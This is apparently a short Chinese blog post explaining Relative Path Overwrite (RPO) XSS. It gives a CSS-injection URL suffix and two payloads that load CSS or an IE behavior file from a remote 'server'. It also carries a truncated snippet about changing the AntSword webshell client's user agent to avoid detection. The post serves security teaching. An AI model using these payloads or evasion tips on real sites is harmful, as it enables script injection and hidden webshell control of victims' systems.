0x00
具体原理参考:
Infinite Security: (Relative Path Overwrite) RPO XSS
RPO Gadgets
RPO攻击
0x01
RPO攻击首先利用的是通过相对路径引入的CSS,如
<link href="styles.css" rel="stylesheet" type="text/css" />
当我们在URL最后添加
/%0a{}*{background:red;}/
的时候会发现页面执行了我们的css代码。
通过这点,我们可以做到任意加载服务器上的文件。
假若我们能控制某些文件就可以达到XSS的目的。
几个Payload:
/%0a{}@import url("http://server/style.css")/
/%0a{}img{behavior:url(http://server/test.png);}/
FROM :rickyhao.com | rickyhao.com
流量分析 挂个代理直接抓包就好了 UA头修改 修改蚁剑工作目录的/modules/request.js,这里面默认是antSword/v2.1 一般需要修改一下,不然极其容易被发现,可以利用平常爬虫的一些技巧,随机构造UA头 ``` let USER_AGEN…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论